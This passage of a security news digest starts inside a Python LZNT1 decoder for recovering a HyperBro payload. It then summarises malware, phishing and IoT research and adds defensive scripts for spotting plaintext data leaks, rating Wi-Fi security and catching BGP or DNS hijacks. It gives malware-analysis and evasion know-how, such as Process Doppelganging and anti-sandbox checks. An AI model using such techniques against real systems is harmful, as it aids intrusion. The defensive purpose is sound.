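Added example, not Kaspersky's or the attackers' code: a pure-Python LZNT1
decoder for recovering the embedded PE from a dump of the decompressor's
input on a non-Windows analysis box. The buffers below are constructed by
hand to exercise the format; they are not the HyperBro payload.
"""
import struct


def _decompress_chunk(chunk: bytes) -> bytes:
    """Decode one compressed LZNT1 chunk (at most 4 KiB of output)."""
    out = bytearray()
    i = 0
    while i < len(chunk):
        flags = chunk[i]
        i += 1
        for bit in range(8):               # one flag bit per token, LSB first
            if i >= len(chunk):
                break
            if not (flags >> bit) & 1:     # clear bit: literal byte
                out.append(chunk[i])
                i += 1
                continue
            if i + 2 > len(chunk):
                raise ValueError("truncated copy token")
            token, = struct.unpack_from("<H", chunk, i)
            i += 2
            # The 16-bit token is split into displacement and length; the
            # split point moves as more of the chunk has been produced.
            produced = len(out) - 1
            length_mask, disp_shift = 0x0FFF, 12
            while produced >= 0x10:
                length_mask >>= 1
                disp_shift -= 1
                produced >>= 1
            length = (token & length_mask) + 3
            displacement = (token >> disp_shift) + 1
            start = len(out) - displacement
            if start < 0:
                raise ValueError("back-reference before start of chunk")
            for k in range(length):        # byte-wise copy handles overlapping runs
                out.append(out[start + k])
    return bytes(out)


def lznt1_decompress(buf: bytes) -> bytes:
    """Walk the chunk headers: bit 15 = compressed, low 12 bits = payload size - 1."""
    out = bytearray()
    pos = 0
    while pos + 2 <= len(buf):
        header, = struct.unpack_from("<H", buf, pos)
        pos += 2
        if header == 0:                    # zero header terminates the stream
            break
        size = (header & 0x0FFF) + 1
        chunk = buf[pos:pos + size]
        pos += size
        if header & 0x8000:
            out += _decompress_chunk(chunk)
        else:                              # stored chunk: copied verbatim
            out += chunk
    return bytes(out)


def looks_like_pe(data: bytes) -> bool:
    """After decompression the carved payload should start with an MZ header."""
    return data[:2] == b"MZ"


# Constructed input: one stored chunk ("hello") followed by one compressed
# chunk: literals A, B, C then a token copying 9 bytes from 3 bytes back.
SAMPLE = (
    b"\x04\x30" + b"hello"                 # header 0x3004: stored, size 5
    + b"\x05\xb0" + b"\x08ABC\x06\x20"     # header 0xB005: compressed, size 6
    + b"\x00\x00"                          # terminator
)

if __name__ == "__main__":
    data = lznt1_decompress(SAMPLE)
    print(data, "looks like PE:", looks_like_pe(data))
```

Dump the buffer the launcher hands to the decompressor (for example at a breakpoint on RtlDecompressBuffer, or the contents of ‘thumb.db’ once the shikata_ga_nai stub has run), pass it to lznt1_decompress(), and check that the output starts with ‘MZ’ before carving it as a PE; a ValueError means the dump is truncated or not LZNT1.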

Olympic Destroyer
In our first report on Olympic Destroyer, the cyberattack on the PyeongChang Winter Olympics, we highlighted a specific spear-phishing attack as the initial infection vector. The threat actor sent weaponized documents, disguised as Olympic-related content, to relevant persons and organizations.

We have continued to track this APT group’s activities and recently noticed that they have started a new campaign with a different geographical distribution and using new themes. Our telemetry, and the characteristics of the spear-phishing documents we have analysed, indicate that the attackers behind Olympic Destroyer are now targeting financial and biotechnology-related organizations based in Europe – specifically, Russia, the Netherlands, Germany, Switzerland and Ukraine.

The group continues to use a non-executable infection vector and highly obfuscated scripts to evade detection.

The earlier Olympic Destroyer attacks – designed to destroy and paralyse infrastructure of the Winter Olympic Games and related supply chains, partners and venues – were preceded by a reconnaissance operation. It’s possible that the new activities are part of another reconnaissance stage that will be followed by a wave of destructive attacks with new motives. This is why it is important for all bio-chemical threat prevention and research companies and organizations in Europe to strengthen their security and run unscheduled security audits.

The variety of financial and non-financial targets could indicate that the same malware is being used by several groups with different interests. This could also be a result of cyberattack outsourcing, which is not uncommon among nation state threat actors. However, it’s also possible that the financial targets might be another false flag operation by a threat actor that has already shown that they excel at this during their last campaign.

It would be possible to draw certain conclusions about who is behind this campaign, based on the motives and selection of targets. However, it would be easy to make a mistake with only the fragments of the picture that are visible to researchers. The appearance of Olympic Destroyer at the start of this year, with its sophisticated deception efforts, changed the attribution game forever. In our view, it is no longer possible to draw conclusions based on a few attribution vectors discovered during a regular investigation. The response to threats such as Olympic Destroyer should be based on co-operation between the private sector and governments across national borders. Unfortunately, the current geo-political situation in the world only boosts the global segmentation of the internet and introduces many obstacles for researchers and investigators. This will encourage APT attackers to continue marching into the protected networks of foreign governments and commercial companies.

Malware stories
Leaking ads
When we download popular apps with good ratings from official app stores, we assume they are safe. This is partially true, because usually these apps have been developed with security in mind and have been reviewed by the app store’s security team. Recently, we looked at 13 million APKs and discovered that around a quarter of them transmit unencrypted data over the internet. This was unexpected, because most apps were using HTTPS to communicate with their servers. But among the HTTPS requests, there were unencrypted requests to third-party servers. Some of these apps were very popular – in some cases they could boast hundreds of millions of downloads. On further inspection, it became clear that the apps were exposing customer data because of third-party SDKs – with advertising SDKs usually to blame. They collect data so that they can show relevant ads, but often fail to protect that data when sending it to their servers.

In most cases the apps were exposing IMEI, IMSI, Android ID, device information (e.g. manufacturer, model, screen resolution, system version and app name). Some apps were also exposing personal information, mostly the customer’s name, age, gender, phone number, e-mail address and even their income.

Information transmitted over HTTP is sent in plain text, allowing almost anyone to read it. Moreover, there are likely to be several ‘transit points’ en route from the app to the third-party server – devices that receive and store information for a certain period of time. Any network equipment, including your home router, could be vulnerable. If hacked, it will give the attackers access to your data. Some of the device information gathered (specifically IMEI and IMSI numbers) is enough to monitor your further actions. The more complete the information, the more of an open book you are to outsiders — from advertisers to fake friends offering malicious files for download. However, data leakage is only part of the problem. It’s also possible for unencrypted information to be substituted. For example, in response to an HTTP request from an app, the server might return a video ad, which cybercriminals can intercept and replace with a malicious version. Or they might simply change the link inside an ad so that it downloads malware.
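As an added example (not Kaspersky’s tooling), the following scanner applies the check described above to HTTP request records of the kind an intercepting proxy exports while the app is exercised: it reports identifiers and personal data only when they travel over plain http://, and validates IMEI values with their Luhn check digit so that random 15-digit numbers are not reported. The request records, hostnames and parameter names are constructed for illustration; real SDKs use their own parameter names, so the key lists are an assumption to extend per app.

```python
"""Flag identifiers and personal data that an app sends over plaintext HTTP.

Added example, not Kaspersky's tooling: a scanner over HTTP request records
such as a proxy or mitm tool exports while the app is exercised. The request
records, hostnames and parameter names below are constructed for illustration;
the SDK endpoints are fictitious.
"""
from urllib.parse import urlsplit, parse_qsl

# Constructed sample: (method, url, body) as a capturing proxy might log them.
SAMPLE_REQUESTS = [
    ("GET", "https://api.example-app.test/v1/feed?uid=42", ""),
    ("POST", "http://track.example-adsdk.test/collect",
     "imei=490154203237518&android_id=9774d56d682e549c&email=jane.doe%40example.test"),
    ("GET", "http://cdn.example-adsdk.test/ad.mp4?model=SM-G950F&os=8.0.0", ""),
    ("POST", "https://track.example-adsdk.test/collect", "imei=490154203237518"),
    ("POST", "http://track.example-adsdk.test/collect", "imei=123456789012345"),
]

# Assumed parameter names; real SDKs vary, so extend these per app.
HARD_IDENTIFIERS = {"imei", "imsi", "android_id", "device_id", "advertising_id", "mac"}
PERSONAL_DATA = {"email", "phone", "name", "gender", "age", "income"}
DEVICE_INFO = {"model", "manufacturer", "os", "os_version", "resolution", "app"}


def luhn_ok(digits: str) -> bool:
    """IMEIs end in a Luhn check digit; use it to drop random 15-digit values."""
    total = 0
    for i, ch in enumerate(reversed(digits)):
        d = int(ch)
        if i % 2 == 1:
            d = d * 2 - 9 if d * 2 > 9 else d * 2
        total += d
    return total % 10 == 0


def classify(key: str, value: str):
    """Return the finding category for a parameter, or None if it is not sensitive."""
    k = key.lower()
    if k == "imei":
        valid = len(value) == 15 and value.isdigit() and luhn_ok(value)
        return "identifier" if valid else None
    if k in HARD_IDENTIFIERS:
        return "identifier"
    if k in PERSONAL_DATA:
        return "personal"
    if k in DEVICE_INFO:
        return "device_info"
    return None


def find_plaintext_leaks(requests):
    """Return findings only for requests that travel unencrypted (http://)."""
    findings = []
    for method, url, body in requests:
        parts = urlsplit(url)
        if parts.scheme.lower() != "http":
            continue                       # HTTPS: not readable in transit
        params = parse_qsl(parts.query, keep_blank_values=True)
        params += parse_qsl(body, keep_blank_values=True)
        for key, value in params:
            category = classify(key, value)
            if category:
                findings.append({
                    "host": parts.hostname, "method": method,
                    "category": category, "key": key.lower(), "value": value,
                })
    return findings


if __name__ == "__main__":
    for f in find_plaintext_leaks(SAMPLE_REQUESTS):
        print(f"{f['category']:<11} {f['method']} {f['host']} {f['key']}={f['value']}")
```

Run it over a proxy export after driving the app for a few minutes; a ‘device_info’ hit alone is low value to an eavesdropper, whereas an ‘identifier’ hit on an http:// host is exactly the IMEI/IMSI exposure described above and is worth reporting to the developer together with the SDK hostname.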

You can find the research here, including our advice to developers and consumers.

SynAck targeted ransomware uses the Doppelganging technique
In April 2018, we saw a version of the SynAck ransomware Trojan that employs the Process Doppelganging technique. This technique, first presented in December 2017 at the BlackHat conference, has been used by several threat actors to try and bypass modern security solutions. It involves using NTFS transactions to launch a malicious process from the transacted file so that it looks like a legitimate process.

Malware developers often use custom packers to try and protect their code. In most cases, such samples can be unpacked with little effort to reveal the original Trojan executable, which can then be analyzed. However, the authors of SynAck obfuscated their code prior to compilation, further complicating the analysis process.

SynAck checks the directory where its executable is started from. If an attempt is made to launch it from an ‘incorrect’ directory, the Trojan simply exits. This is designed to counter automatic sandbox analysis.

The Trojan also checks whether it is being launched on a PC with a Cyrillic keyboard layout installed. If so, it sleeps for 300 seconds and then exits, so as to avoid encrypting files belonging to victims in countries where Cyrillic is used.

Like other ransomware, SynAck uses a combination of symmetric and asymmetric encryption algorithms. You can find the details here.

The attacks are highly targeted, with a limited number of attacks observed against targets in the US, Kuwait, Germany and Iran. The ransom demands can be as high as $3,000.

Roaming Mantis
In May we published our analysis of a mobile banking Trojan, Roaming Mantis. We called it this because of its propagation via smartphones roaming between different Wi-Fi networks, although the malware is also known as ‘Moqhao’ and ‘XLoader’. This malicious Android app is spread using DNS hijacking through compromised routers. The victims are redirected to malicious IP addresses used to install malicious apps – called ‘facebook.apk’ and ‘chrome.apk’. The attackers count on the fact that victims are unlikely to be suspicious as long as the browser displays the legitimate URL.

The malware is designed to steal user information, including credentials for two-factor authentication, and give the attackers full control over compromised Android devices. The malware seems to be financially motivated and the low OPSEC suggests that this is the work of cybercriminals.

Our telemetry indicates that the malware was detected more than 6,000 times between February 9 and April 9, although the reports came from just 150 unique victims – some of whom saw the same malware appear again and again on their network. Our research revealed that there were thousands of daily connections to the attackers’ C2 infrastructure.

The malware contains Android application IDs for popular mobile banking and game applications in South Korea. It seems the malicious app was initially targeted at victims in South Korea and this is where the malware was most prevalent. We also saw infections in China, India and Bangladesh.

It’s unclear how the attackers were able to hijack the router settings. If you are concerned about DNS settings on your router, you should check the user manual to verify that your DNS settings haven’t been tampered with, or contact your ISP for support. We would also strongly recommend that you change the default login and password for the admin web interface of the router, don’t install firmware from third-party sources and update the router firmware regularly to prevent similar attacks.

Some clues left behind by the attackers – for example, comments in the HTML source, malware strings and a hardcoded legitimate website – point to Simplified Chinese. So we believe the cybercriminals are familiar with both Simplified Chinese and Korean.

Following our report, we continued to track this campaign. Less than a month later, Roaming Mantis had rapidly expanded its activities to include countries in Europe, the Middle East and beyond, supporting 27 languages in total.

The attackers also extended their activities beyond Android devices. On iOS, Roaming Mantis uses a phishing site to steal the victim’s credentials. When the victim connects to the landing page from an iOS device, they are redirected to a fake ‘http://security.apple.com/’ webpage where the attackers steal the user ID, password, card number, card expiry date and CVV.

On PCs, Roaming Mantis runs the CoinHive mining script to generate crypto-currency for the attackers – drastically increasing the victim’s CPU usage.

The evasion techniques used by Roaming Mantis have also become more sophisticated. They include a new method of retrieving the C2 address via the POP e-mail protocol, server-side dynamic generation of the APK file and its filename, and an additional command that may help the attackers identify research environments.

The rapid growth of the campaign implies that those behind it have a strong financial motivation and are probably well-funded.

If it’s smart, it’s potentially vulnerable
Our many years of experience in researching cyberthreats suggest that if a device is connected to the internet, eventually someone will try to hack it. This includes children’s CCTV cameras, baby monitors, household appliances and even children’s toys.

This also applies to routers – the gateway into a home network. In May, we described four vulnerabilities and hardcoded accounts in the firmware of the D-Link DIR-620 router – this runs on various D-Link routers supplied to customers by one of the biggest ISPs in Russia.

The latest versions of the firmware have hardcoded default credentials that can be exploited by an unauthenticated attacker to gain privileged access to the firmware and to extract sensitive data – for example, configuration files with plain-text passwords. The vulnerable web interface allows an unauthenticated attacker to run arbitrary JavaScript code in the user environment and arbitrary commands in the router’s operating system. The issues were originally identified in firmware version 1.0.37, although some of the discovered vulnerabilities were also identified in other versions of the firmware.

You can read the details on the vulnerabilities here.

In May, we also investigated smart devices for animals – specifically, trackers to monitor the location of pets. These gadgets are able to access the pet owner’s home network and phone, and their pet’s location. We wanted to find out how secure they are. Our researchers looked at several popular trackers for potential vulnerabilities.

Four of the trackers we looked at use Bluetooth LE technology to communicate with the owner’s smartphone. But only one does so correctly. The others can receive and execute commands from anyone. They can also be disabled, or hidden from the owner – all that’s needed is proximity to the tracker. Only one of the tested Android apps verifies its server’s certificate itself (certificate pinning) rather than relying solely on the system trust store. The rest are therefore vulnerable to Man-in-the-Middle (MitM) attacks: an intruder who ‘persuades’ the victim to install their certificate can intercept the transmitted data.

GPS trackers have been used successfully in many areas, but using them to track the location of pets is a step beyond their traditional scope of application. For this, they need to be upgraded with new ‘user communication interfaces’ and ‘trained’ to work with cloud services, etc. If security is not properly addressed, user data becomes accessible to intruders, potentially endangering both users and pets.

Some of our researchers recently looked at human wearable devices – specifically, smart watches and fitness trackers. We were interested in a scenario where a spying app installed on a smartphone could send data from the built-in motion sensors (accelerometer and gyroscope) to a remote server and use the data to piece together the wearer’s actions – walking, sitting, typing, etc. We started with an Android-based smartphone, created a simple app to process and transmit the data and then looked at what we could get from this data.

Not only was it possible to work out if the wearer is sitting or walking, but also to figure out if they are out for a stroll or changing subway trains, because the accelerometer patterns differ slightly – this is how fitness trackers distinguish between walking and cycling. It is also easy to see when someone is typing. However, finding out what they are typing would be hard and would require repeated text entry. Our researchers were able to determine the moments when a computer password was entered with 96 per cent accuracy, and when a PIN code was entered at an ATM with 87 per cent accuracy. However, it would be much harder to obtain other information – for example, a credit card number or CVC code – because of the lack of predictability about when the victim would type such information.

In reality, the difficulty involved in obtaining such information means that an attacker would have to have a strong motive for targeting someone specific. Of course, there are situations where this might be worthwhile for attackers.

An MitM extension for Chrome
Many browser extensions make our lives easier, hiding obtrusive advertising, translating text, helping us to choose the goods we want in online stores, etc. Unfortunately, there are also less desirable extensions that are used to bombard us with advertising or collect information about our activities. Then there are extensions whose main aim is to steal money. In the course of our work, we analyse a large number of extensions from different sources. Recently, a particular browser extension caught our eye because it communicated with a suspicious domain.

This extension, named ‘Desbloquear Conteúdo’ (which means ‘Unblock Content’ in Portuguese) targeted customers of Brazilian online banking services – all the attempted installations that we traced occurred in Brazil.

The aim of this malicious extension is to harvest logins and passwords and then steal money from the victims’ bank accounts. Such extensions are quite rare, but they need to be taken seriously because of the potential damage they can cause. You should only install verified extensions with large numbers of installations and reviews in the Chrome Web Store or other official service. Even so, in spite of the protection measures implemented by the owners of such services, malicious extensions can still end up being published there. So it’s a good idea to use an internet security product that gives you a warning if an extension acts suspiciously.

By the time we published our report on this malicious extension, it had already been removed from the Chrome Web Store.

The World Cup of fraud
Fraudsters are always on the lookout for opportunities to make money off the back of major sporting events. The FIFA World Cup is no different. Long before anyone kicked a football in Russia, cybercriminals had started to create phishing websites and send messages exploiting World Cup themes.

This included notifications of fake lottery wins, informing recipients that they had won cash in a lottery supposedly held by FIFA or official partners and sponsors.

They typically contain attached documents congratulating the ‘winner’ and asking for personal details such as name, address, e-mail address, telephone number, etc. Sometimes such messages also contain malicious programs, such as banking Trojans.

Sometimes recipients are invited to take part in a ticket giveaway, or they are offered the chance to win a trip to a match. Such messages are sent in the name of FIFA, usually from addresses on recently registered domains. The purpose of such schemes is mainly to update e-mail databases used to distribute more spam.

One of the most popular ways to steal banking and other credentials is to create counterfeit imitations of official partner websites. Partner organizations often arrange ticket giveaways for clients, and attackers exploit this to lure their victims onto fake promotion sites. Such pages look very convincing: they are well-designed, with a working interface, and are hard to distinguish from the real thing. Some fraudsters buy SSL certificates to add further credibility to their fake sites. Cybercriminals are particularly keen to target clients of Visa, the tournament’s commercial sponsor, offering prize giveaways in Visa’s name. To take part, people need to follow a link that points to a phishing site where they are asked to enter their bank card details, including the CVV/CVC code.

Cybercriminals also try to extract data by mimicking official FIFA notifications. The victim is informed that the security system has been updated and all personal data must be re-entered to avoid being locked out. The link in the message takes the victim to a fake account and all the data they enter is harvested by the scammers.

In the run up to the tournament, we also registered a lot of spam advertising soccer-related merchandise, though sometimes the scammers try to sell other things too – for example, pharmaceutical products.

You can find our report on the ways cybercriminals have exploited the World Cup in order to make money here. We’ve provided some tips on how to avoid phishing scams – advice that holds good for any phishing scams, not just for those related to the World Cup.

In the run up to the tournament, we also analyzed wireless access points in 11 cities hosting FIFA World Cup matches – nearly 32,000 Wi-Fi hotspots in total. While checking encryption and authentication algorithms, we counted the number of WPA2 and open networks, as well as their share among all the access points.

More than a fifth of the hotspots are unreliable (typically open networks): a criminal only needs to be within range of the access point to intercept traffic and get hold of people’s data. Around three quarters of the access points use WPA/WPA2 encryption, considered among the most secure options. The level of protection then depends mostly on the configuration, above all the strength of the passphrase chosen by the hotspot owner; a complex key can take years to crack. Even reliable networks such as WPA2, however, cannot automatically be considered secure: they remain susceptible to brute-force, dictionary and key reinstallation (KRACK) attacks, for which plenty of tutorials and open-source tools are available online. An attacker can also intercept traffic on a WPA-protected public hotspot by positioning themselves between the access point and the device when the session is being established.
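The survey’s tally can be reproduced for any local scan. The following added example (my own code, not Kaspersky’s survey tooling) classifies the terse output of `nmcli -t -f SSID,SECURITY dev wifi list` and computes the shares of open, WEP and WPA2 networks; the scan lines are constructed, and the protection classes are my own simplification of what the SECURITY column reports.

```python
"""Tally access points by protection level from an nmcli scan.

Added example, not Kaspersky's survey code: the same kind of count the report
describes, run over the terse output of
`nmcli -t -f SSID,SECURITY dev wifi list`. The scan lines below are
constructed; the classification is a deliberate simplification.
"""
from collections import Counter

# Constructed scan output: "SSID:SECURITY" per line, SECURITY empty or "--" when open.
SCAN_OUTPUT = """\
Stadium-Free:
Fanzone:--
CoffeeShop:WEP
Hotel-Guest:WPA1
Airport_WiFi:WPA2
Corp-Staff:WPA2 802.1X
Home-5G:WPA1 WPA2
Museum:WPA3
"""


def classify(security: str) -> str:
    """Map nmcli's SECURITY field to a coarse protection class."""
    sec = security.strip().upper()
    if sec in ("", "--"):
        return "open"                  # anyone in range can read the traffic
    if "WEP" in sec:
        return "broken"                # WEP keys are recoverable in minutes
    if "802.1X" in sec:
        return "enterprise"            # per-user credentials, no shared passphrase
    if "WPA3" in sec:
        return "wpa3"
    if "WPA2" in sec:
        return "wpa2-psk"              # strength rests on the passphrase; mixed WPA1/WPA2 can be downgraded
    if "WPA" in sec:
        return "wpa1-psk"              # TKIP era, treat as weak
    return "unknown"


def tally(scan_text: str):
    """Return (counts, shares) over the scan; shares are fractions of all APs."""
    counts = Counter()
    for line in scan_text.splitlines():
        if not line.strip():
            continue
        # nmcli escapes ':' inside SSIDs as '\:', so split on the last colon only.
        _ssid, _, security = line.rpartition(":")
        counts[classify(security)] += 1
    total = sum(counts.values())
    shares = {cls: n / total for cls, n in counts.items()} if total else {}
    return counts, shares


def unreliable_share(scan_text: str) -> float:
    """Share of hotspots a passive eavesdropper can read: open or WEP."""
    counts, _ = tally(scan_text)
    total = sum(counts.values())
    return (counts["open"] + counts["broken"]) / total if total else 0.0


if __name__ == "__main__":
    counts, shares = tally(SCAN_OUTPUT)
    for cls, n in counts.most_common():
        print(f"{cls:<11} {n:>3} {shares[cls]:6.1%}")
    print(f"unreliable: {unreliable_share(SCAN_OUTPUT):.1%}")
```

Pipe a real scan in with `nmcli -t -f SSID,SECURITY dev wifi list | python3 scan_tally.py` after replacing SCAN_OUTPUT with sys.stdin.read(); note that a WPA2-PSK count says nothing about passphrase strength, which is why the report treats WPA2 as ‘depends on the settings’ rather than safe.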

You can read our report here, together with our recommendations on the safe use of Wi-Fi hotspots, advice that holds good wherever you may be – not just at the World Cup.

Snapchat Source Code Leaked
8.8.2018 securityweek  Apple

iOS Update Led to Snapchat Source Code Leak

Hackers obtained some source code for the popular messaging application Snapchat and made it public on GitHub, claiming that they were ignored by the app’s developer.

The source code appears to be for the frontend of Snapchat for iOS. The company behind Snapchat, Snap Inc., effectively confirmed that the code is genuine by getting GitHub to remove it with a DMCA (Digital Millennium Copyright Act) takedown request.

When users file a DMCA request with GitHub, they are instructed to provide a detailed description of the original copyrighted work that has allegedly been infringed. In this section, a Snap representative wrote, “Snapchat source code. It was leaked and a user has put it in this GitHub repo. There is no URL to point to because Snap Inc. doesn't publish it publicly.”

Snapchat told several news websites that the leak is a result of an iOS update made in May that exposed a “small amount” of its source code. The issue has been addressed and the company says the incident has not compromised its application and had no impact on the Snapchat community.

Messages posted on Twitter by the individuals who appear to be behind the source code leak suggest that they are expecting some sort of “reward” from Snapchat. It’s not uncommon for researchers who find vulnerabilities to quarrel with vendors over the impact or severity of a bug. However, Snapchat appears to be the target of an extortion attempt considering that the hackers say they will continue posting the code.

At least two individuals, allegedly based in Pakistan and France, appear to be involved in the incident. They have been posting messages written in Arabic and English on Twitter.

While Snap says the code posted online has been removed, at least two forks (i.e. copies) exist on GitHub and they suggest that the code has been online since May 24. A few hours before this article was published, the original hackers also re-uploaded the code to GitHub.

Snapchat does have an official bug bounty program powered by HackerOne and the company has been known to award significant rewards for critical vulnerabilities. Last year, two researchers earned a total of $20,000 for finding exposed Jenkins instances that allowed arbitrary code execution and provided access to sensitive data.

Canadian Industrial Security Firm iS5Com Raises $17 Million
8.8.2018 securityweek  IT

iS5 Communications (iS5Com), a Canadian provider of networking and cybersecurity solutions for industrial systems, announced on Tuesday that it has raised roughly $17 million (CDN $22 million) in funding.

According to the company, the funding will be used to enhance its flagship RAPTOR platform and to develop additional solutions for securing critical infrastructure communications and networks.

Designed to protect Smart Cities and various critical infrastructure systems, including those in harsh environments, RAPTOR is compliant with IEC 61850 Ed. 2, IEEE 1613, and EN50155 standards. The flexible platform allows the customers to connect various plug‐in modules to meet functional requirements, the company says.

Additionally, the company says that all of its products have the ability to transmit data efficiently without the loss of any packets under harsh environments and EMI conditions.

Phoenix Contact Innovation Ventures GmbH led the round with participation from new investors, existing shareholders and management.

IBM Opens New Labs for Cracking ATMs, IoT Devices
8.8.2018 securityweek  IoT

IBM’s X-Force Red, a team of veteran hackers focused on finding security vulnerabilities in devices and systems, now has four new labs to work in.

The new network of facilities provides all the toys required for testing the security of consumer and industrial Internet of Things (IoT) technologies, automotive equipment, and Automated Teller Machines (ATMs), both before and after they are deployed to customers.

Referred to as X-Force Red Labs, the new facilities are located in Austin, TX; Hursley, England; Melbourne, Australia; and Atlanta, GA. Additionally, the IBM X-Force Red has launched a dedicated ATM Testing practice.

The IBM X-Force Red team has grown significantly: its penetration testing client base increased by over 170% in the last year, and the number of X-Force Red practitioners across multiple domains doubled.

“IBM X-Force Red has one mission – hack anything to secure everything. Via X-Force Red Labs, we have the ability to do just that, in a secure and controlled environment,” Charles Henderson, Global Managing Partner, IBM X-Force Red, said.

Services provided by IBM X-Force Red through the four new global testing labs include documenting product requirements with product engineers, technical analysis to scope the penetration test, disclosing potential threats and risks to the product and company, creating and implementing a list of security requirements, and hacking the products the way real-world attackers would.

With over 300 million ATMs globally, finding and addressing vulnerabilities in these systems is one of the key activities the X-Force Red team engages in. According to IBM, it saw a 300% increase in requests for ATM testing, mainly driven by a massive increase in attacks on these devices.

The jackpotting attacks on ATMs, which are performed using both malware and physical access to the machines, have reached the United States as well. With many ATMs running outdated software, cybercriminals attempt to find and exploit vulnerabilities in them for financial gain.

X-Force Red ATM Testing service can help identify and remediate physical, hardware and software vulnerabilities within ATMs before the attackers, IBM says.

The team evaluates the physical, network, application, and computer system security of ATMs, uses the same tools and methods as criminals to break into these machines, helps harden systems and defenses, and reviews ATM logs to help financial organizations stay compliant with industry standards.

BGP Hijacking Attacks Target US Payment Processors
8.8.2018 securityweek  Hacking

Several payment processing companies in the United States were targeted recently in BGP hijacking attacks whose goal was to redirect users to malicious websites, Oracle reported last week.

The Border Gateway Protocol (BGP) determines the paths that traffic takes between networks across the Internet. In a BGP hijack, also known as prefix or route hijacking, an attacker announces IP prefixes they do not own (or more specific sub-prefixes of them); routers elsewhere accept the false route and send traffic for those addresses to the attacker instead of to the legitimate owner.

In the past months, Oracle, which gained deep visibility into Web traffic after acquiring Dyn in 2016, has observed several instances of malicious actors trying to force users to their websites by targeting authoritative DNS servers in BGP hijacking attacks.

The attackers used rogue DNS servers to return forged DNS responses to users trying to access the targeted websites. They prolonged the effect of each attack by setting long time-to-live (TTL) values on the forged responses, so that caching resolvers would keep the fake records long after the hijacked route had been withdrawn.

“[The] perpetrators showed attention to detail, setting the TTL of the forged response to ~5 days. The normal TTL for the targeted domains was 10 minutes (600 seconds). By configuring a very long TTL, the forged record could persist in the DNS caching layer for an extended period of time, long after the BGP hijack had stopped,” explained Doug Madory, Director of Internet Analysis at Oracle's Internet Intelligence team.
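Two checks a monitoring team could run against this kind of attack, as an added example that is not Oracle’s code: a route-origin comparison against a baseline that also catches more-specific announcements (which win by longest-prefix match, so a /24 carved out of a victim’s /22 draws the traffic even while the legitimate /22 is still announced), and a TTL outlier check over observed DNS answers, which is what gives the forged record away. All prefixes, ASNs, names and records are constructed from documentation ranges; the ‘factor’ threshold is an assumption to tune per zone.

```python
"""Catch route-origin anomalies and the long-TTL forged DNS answers that follow.

Added example, not Oracle's monitoring code: a baseline check of prefix ->
origin ASN that also flags more-specific announcements, plus a TTL sanity
check over observed DNS answers. All prefixes, ASNs, names and records are
constructed (RFC 5737 addresses and documentation ASNs).
"""
from ipaddress import ip_network

# Constructed baseline: prefixes we care about and the ASN that should originate them.
BASELINE_ORIGINS = {
    "198.51.100.0/22": 64496,   # hosts the authoritative DNS for payments.example
    "203.0.113.0/24": 64497,
}

# Constructed BGP updates (prefix, origin ASN) as a route-collector feed shows them.
OBSERVED_ROUTES = [
    ("198.51.100.0/22", 64496),   # legitimate
    ("198.51.100.0/24", 64500),   # more-specific from a stranger: wins by longest match
    ("203.0.113.0/24", 64501),    # same prefix, different origin
    ("192.0.2.0/24", 64502),      # not in the baseline: nothing to compare against
]


def check_origins(baseline, observed):
    """Return one alert per announcement that conflicts with the baseline."""
    base = [(ip_network(p), asn) for p, asn in baseline.items()]
    alerts = []
    for prefix, origin in observed:
        net = ip_network(prefix)
        for bnet, basn in base:
            if net.version != bnet.version or origin == basn:
                continue               # different family, or the expected origin
            if net == bnet:
                alerts.append({"prefix": prefix, "origin": origin,
                               "kind": "origin-mismatch", "expected": basn})
            elif net.subnet_of(bnet):
                alerts.append({"prefix": prefix, "origin": origin,
                               "kind": "more-specific", "covers": str(bnet),
                               "expected": basn})
    return alerts


# Constructed DNS answers (name, rdata, ttl) as a passive-DNS sensor records them.
BASELINE_TTL = {"ns1.payments.example.": 600}
OBSERVED_ANSWERS = [
    ("ns1.payments.example.", "198.51.100.10", 600),
    ("ns1.payments.example.", "203.0.113.66", 432000),   # ~5 days: outlives the hijack
]


def check_ttls(baseline_ttl, answers, factor=10):
    """Flag answers whose TTL exceeds the name's usual TTL by more than `factor`."""
    return [
        {"name": name, "rdata": rdata, "ttl": ttl, "usual": baseline_ttl[name]}
        for name, rdata, ttl in answers
        if name in baseline_ttl and ttl > baseline_ttl[name] * factor
    ]


if __name__ == "__main__":
    for a in check_origins(BASELINE_ORIGINS, OBSERVED_ROUTES):
        print("BGP", a)
    for a in check_ttls(BASELINE_TTL, OBSERVED_ANSWERS):
        print("DNS", a)
```

Feed check_origins() from a route-collector stream and check_ttls() from resolver or passive-DNS logs; a ‘more-specific’ alert on a prefix that hosts authoritative name servers, followed within minutes by a TTL outlier for a name in that zone, is the pattern described above. The DNS check matters even after the route is restored, because the forged record keeps serving from caches until its TTL expires.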

Oracle spotted the first BGP hijacking attempt on July 6, when an Indonesian ISP announced some prefixes associated with Vantiv, a brand owned by US-based payment processing company Worldpay.

The same prefixes were also announced on July 10 by a Malaysian ISP. At the same time, someone hijacked domains associated with Datawire, which is described as a “connectivity service that transports financial transactions securely and reliably over the public Internet to payment processing systems.”

On July 11, someone started hijacking prefixes associated with Mercury Payment Systems, which is also owned by Worldpay. The previously targeted prefixes were then once again hijacked on July 12.

While the initial BGP attacks did not have a significant impact, the last hijacks, which involved Vantiv domains, lasted for nearly three hours, Oracle reported.

A similar attack was seen by the company in April, when cybercriminals attempted to conduct a BGP hijack of Amazon's authoritative DNS service in an effort to redirect users of a cryptocurrency wallet to a fake website set up to steal their money. Evidence suggests that the recent attacks are linked to the ones from April.

Ramnit is back and contributes in creating a massive proxy botnet, tracked as ‘Black’ botnet
8.8.2018 securityaffairs   BotNet

Security researchers at Checkpoint security have spotted a massive proxy botnet, tracked as ‘Black’ botnet, created by Ramnit operators.
Security researchers at Checkpoint security have spotted a massive proxy botnet, tracked as ‘Black’ botnet, that could be the sign of a wider ongoing operation involving the Ramnit operators.

Ramnit is one of the most prevalent banking malware families in existence today. It was first spotted in 2010 as a worm; in 2011, its authors reworked it on the basis of the leaked Zeus source code, turning it into a banking Trojan. In 2014 it reached the pinnacle of its success, becoming the fourth largest botnet in the world.

In 2015, Europol partnering with several private technology firms announced the takedown of the Ramnit C2 infrastructure.

A few months later Ramnit was back, the researchers at IBM security discovered a new variant of the popular Ramnit Trojan.

Recently the experts observed that the “Black” botnet campaign has infected up to 100,000 systems in two months, and this is just the tip of the iceberg because, according to the researchers, a second-stage malware called Ngioweb is already spreading.

There is the concrete risk that Ramnit operators are using the two malware to build a large, multi-purpose proxy botnet that could be used for many fraudulent activities (i.e. DDoS attacks, ransomware-based campaigns, cryptocurrency mining campaigns).

